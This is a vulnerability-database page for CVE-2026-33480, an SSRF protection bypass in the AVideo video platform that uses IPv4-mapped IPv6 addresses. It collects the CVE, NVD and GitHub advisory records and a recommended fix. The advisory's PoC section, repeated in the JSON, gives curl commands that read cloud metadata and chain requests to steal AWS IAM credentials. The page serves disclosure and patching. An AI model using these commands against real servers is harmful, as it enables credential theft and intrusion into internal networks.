Vulnerability-Lookup

CVE-2026-33480 (GCVE-0-2026-33480)

Vulnerability from cvelistv5 – Published: 2026-03-23 14:08 – Updated: 2026-03-23 15:57

Title

AVideo has a SSRF Protection Bypass via IPv4-Mapped IPv6 Addresses in Unauthenticated LiveLinks Proxy

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services. Commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contains a patch.

Severity

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/75ce8a579a5…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33480",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-23T15:57:09.427654Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-23T15:57:19.767Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services. Commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T14:08:49.302Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373"
        }
      ],
      "source": {
        "advisory": "GHSA-p3gr-g84w-g8hh",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has a SSRF Protection Bypass via IPv4-Mapped IPv6 Addresses in Unauthenticated LiveLinks Proxy"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33480",
    "datePublished": "2026-03-23T14:08:49.302Z",
    "dateReserved": "2026-03-20T16:16:48.970Z",
    "dateUpdated": "2026-03-23T15:57:19.767Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33480",
      "date": "2026-06-04",
      "epss": "0.00068",
      "percentile": "0.21001"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33480\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T15:16:34.400\",\"lastModified\":\"2026-03-24T18:46:11.393\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services. Commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de v\u00eddeo de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, la funci\u00f3n \u0027isSSRFSafeURL()\u0027 en AVideo puede ser eludida utilizando direcciones IPv6 mapeadas a IPv4 (\u0027::ffff:x.x.x.x\u0027). El punto final no autenticado \u0027plugin/LiveLinks/proxy.php\u0027 utiliza esta funci\u00f3n para validar URL antes de recuperarlas con curl, pero el prefijo IPv6 mapeado a IPv4 pasa todas las comprobaciones, permitiendo a un atacante acceder a servicios de metadatos en la nube, redes internas y servicios de localhost. El commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}"
  }
}

FKIE_CVE-2026-33480

Vulnerability from fkie_nvd - Published: 2026-03-23 15:16 - Updated: 2026-03-24 18:46

Severity

8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services. Commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de v\u00eddeo de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, la funci\u00f3n \u0027isSSRFSafeURL()\u0027 en AVideo puede ser eludida utilizando direcciones IPv6 mapeadas a IPv4 (\u0027::ffff:x.x.x.x\u0027). El punto final no autenticado \u0027plugin/LiveLinks/proxy.php\u0027 utiliza esta funci\u00f3n para validar URL antes de recuperarlas con curl, pero el prefijo IPv6 mapeado a IPv4 pasa todas las comprobaciones, permitiendo a un atacante acceder a servicios de metadatos en la nube, redes internas y servicios de localhost. El commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contiene un parche."
    }
  ],
  "id": "CVE-2026-33480",
  "lastModified": "2026-03-24T18:46:11.393",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-23T15:16:34.400",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-P3GR-G84W-G8HH

Vulnerability from github – Published: 2026-03-20 20:44 – Updated: 2026-03-25 18:49

Summary

AVideo has a SSRF Protection Bypass via IPv4-Mapped IPv6 Addresses in Unauthenticated LiveLinks Proxy

Details

Summary

The isSSRFSafeURL() function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x). The unauthenticated plugin/LiveLinks/proxy.php endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.

Details

The isSSRFSafeURL() function in objects/functions.php (lines 4021-4169) implements SSRF protection with two separate check paths:

IPv4 checks (lines 4101-4134): Regex patterns matching dotted-decimal notation (/^10\./, /^172\./, /^192\.168\./, /^127\./, /^169\.254\./)
IPv6 checks (lines 4150-4166): Checks for ::1, fe80::/10 (link-local), and fc00::/7 (unique local)

The gap: IPv4-mapped IPv6 addresses (::ffff:0:0/96) are not checked in either path. When a URL like http://[::ffff:169.254.169.254]/ is provided:

// Line 4038: parse_url strips brackets from IPv6 host
$host = parse_url($url, PHP_URL_HOST);
// $host = "::ffff:169.254.169.254"

// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution
if (!filter_var($host, FILTER_VALIDATE_IP)) {
    $resolvedIP = gethostbyname($host);  // SKIPPED
}
$ip = $host;  // $ip = "::ffff:169.254.169.254"

// Lines 4101-4134: IPv4 regex checks DON'T match (not dotted-decimal)
if (preg_match('/^169\.254\.\d{1,3}\.\d{1,3}$/', $ip))  // NO MATCH

// Lines 4150-4166: IPv6 checks don't cover ::ffff: prefix
if ($ip === '::1' || ...)                    // NO MATCH
if (preg_match('/^fe[89ab][0-9a-f]:/i', $ip))  // NO MATCH
if (preg_match('/^f[cd][0-9a-f]{2}:/i', $ip))  // NO MATCH

// Line 4168: returns TRUE — bypass complete
return true;

The vulnerable endpoint plugin/LiveLinks/proxy.php explicitly disables authentication:

// proxy.php lines 2-3
$doNotConnectDatabaseIncludeConfig = 1;
$doNotStartSessionbaseIncludeConfig = 1;

After the bypass, two requests are made to the attacker-controlled URL: 1. get_headers() at line 40 (via stream context) 2. fakeBrowser() at line 63 (via curl) — response content is echoed back to the attacker (lines 69-80)

PoC

Read AWS instance metadata (IAM credentials):

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/'

Access localhost services:

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/'

Scan internal network:

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/'

Steal AWS IAM role credentials (full chain):

# Step 1: Get IAM role name
ROLE=$(curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/')

# Step 2: Get temporary credentials for the role
curl -s "https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}"

Impact

Cloud credential theft: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.
Internal network access: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.
Localhost service access: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).
No authentication required: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.

Recommended Fix

Replace the manual IPv4/IPv6 blocklist approach with PHP's built-in FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:

// In isSSRFSafeURL(), replace lines 4099-4166 with:

// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    _error_log("isSSRFSafeURL: blocked private/reserved IP: {$ip}");
    return false;
}

This single check replaces all the manual regex patterns and correctly handles: - All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16) - Loopback (127/8, ::1) - Link-local (169.254/16, fe80::/10) - Unique local (fc00::/7) - IPv4-mapped IPv6 (::ffff:0:0/96) — the bypass vector in this finding - Other reserved ranges (0/8, 100.64/10 CGN, etc.)

Severity

8.6 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:44:10Z",
    "nvd_published_at": "2026-03-23T15:16:34Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.\n\n## Details\n\nThe `isSSRFSafeURL()` function in `objects/functions.php` (lines 4021-4169) implements SSRF protection with two separate check paths:\n\n1. **IPv4 checks** (lines 4101-4134): Regex patterns matching dotted-decimal notation (`/^10\\./`, `/^172\\./`, `/^192\\.168\\./`, `/^127\\./`, `/^169\\.254\\./`)\n2. **IPv6 checks** (lines 4150-4166): Checks for `::1`, `fe80::/10` (link-local), and `fc00::/7` (unique local)\n\nThe gap: IPv4-mapped IPv6 addresses (`::ffff:0:0/96`) are not checked in either path. When a URL like `http://[::ffff:169.254.169.254]/` is provided:\n\n```\n// Line 4038: parse_url strips brackets from IPv6 host\n$host = parse_url($url, PHP_URL_HOST);\n// $host = \"::ffff:169.254.169.254\"\n\n// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution\nif (!filter_var($host, FILTER_VALIDATE_IP)) {\n    $resolvedIP = gethostbyname($host);  // SKIPPED\n}\n$ip = $host;  // $ip = \"::ffff:169.254.169.254\"\n\n// Lines 4101-4134: IPv4 regex checks DON\u0027T match (not dotted-decimal)\nif (preg_match(\u0027/^169\\.254\\.\\d{1,3}\\.\\d{1,3}$/\u0027, $ip))  // NO MATCH\n\n// Lines 4150-4166: IPv6 checks don\u0027t cover ::ffff: prefix\nif ($ip === \u0027::1\u0027 || ...)                    // NO MATCH\nif (preg_match(\u0027/^fe[89ab][0-9a-f]:/i\u0027, $ip))  // NO MATCH\nif (preg_match(\u0027/^f[cd][0-9a-f]{2}:/i\u0027, $ip))  // NO MATCH\n\n// Line 4168: returns TRUE \u2014 bypass complete\nreturn true;\n```\n\nThe vulnerable endpoint `plugin/LiveLinks/proxy.php` explicitly disables authentication:\n\n```php\n// proxy.php lines 2-3\n$doNotConnectDatabaseIncludeConfig = 1;\n$doNotStartSessionbaseIncludeConfig = 1;\n```\n\nAfter the bypass, two requests are made to the attacker-controlled URL:\n1. `get_headers()` at line 40 (via stream context)\n2. `fakeBrowser()` at line 63 (via curl) \u2014 response content is echoed back to the attacker (lines 69-80)\n\n## PoC\n\n**Read AWS instance metadata (IAM credentials):**\n\n```bash\ncurl -s \u0027https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/\u0027\n```\n\n**Access localhost services:**\n\n```bash\ncurl -s \u0027https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/\u0027\n```\n\n**Scan internal network:**\n\n```bash\ncurl -s \u0027https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/\u0027\n```\n\n**Steal AWS IAM role credentials (full chain):**\n\n```bash\n# Step 1: Get IAM role name\nROLE=$(curl -s \u0027https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/\u0027)\n\n# Step 2: Get temporary credentials for the role\ncurl -s \"https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}\"\n```\n\n## Impact\n\n- **Cloud credential theft**: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.\n- **Internal network access**: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.\n- **Localhost service access**: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).\n- **No authentication required**: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.\n\n## Recommended Fix\n\nReplace the manual IPv4/IPv6 blocklist approach with PHP\u0027s built-in `FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE` flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:\n\n```php\n// In isSSRFSafeURL(), replace lines 4099-4166 with:\n\n// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)\nif (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n    _error_log(\"isSSRFSafeURL: blocked private/reserved IP: {$ip}\");\n    return false;\n}\n```\n\nThis single check replaces all the manual regex patterns and correctly handles:\n- All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16)\n- Loopback (127/8, ::1)\n- Link-local (169.254/16, fe80::/10)\n- Unique local (fc00::/7)\n- **IPv4-mapped IPv6 (`::ffff:0:0/96`)** \u2014 the bypass vector in this finding\n- Other reserved ranges (0/8, 100.64/10 CGN, etc.)",
  "id": "GHSA-p3gr-g84w-g8hh",
  "modified": "2026-03-25T18:49:36Z",
  "published": "2026-03-20T20:44:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33480"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has a SSRF Protection Bypass via IPv4-Mapped IPv6 Addresses in Unauthenticated LiveLinks Proxy"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33480 (GCVE-0-2026-33480)

FKIE_CVE-2026-33480

GHSA-P3GR-G84W-G8HH

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature